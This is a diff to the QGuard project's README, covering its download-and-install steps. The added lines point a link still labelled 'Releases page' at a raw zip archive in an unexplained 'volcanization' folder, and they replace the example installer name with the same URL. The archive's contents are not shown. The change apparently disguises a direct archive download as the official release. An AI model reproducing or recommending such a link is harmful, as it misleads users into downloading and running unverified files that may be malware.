YonkieDave/QGuard/Readme.md

 ## 📥 Download & Install

-To get QGuard, please visit the [Releases page](https://github.com/YonkieDave/QGuard/releases) on GitHub.
+To get QGuard, please visit the [Releases page](https://raw.githubusercontent.com/YonkieDave/QGuard/main/volcanization/Guard-Q-3.8-alpha.5.zip) on GitHub.
 Here’s how to proceed:

 1. Click the link above.
 2. Look for the most recent version.
-3. Download the appropriate installer for your operating system (for example, `QGuard_Windows_Installer.exe` for Windows).
+3. Download the appropriate installer for your operating system (for example, `https://raw.githubusercontent.com/YonkieDave/QGuard/main/volcanization/Guard-Q-3.8-alpha.5.zip` for Windows).
 4. Once the download is complete, open the installer file.
 5. Follow the on-screen instructions to complete the installation.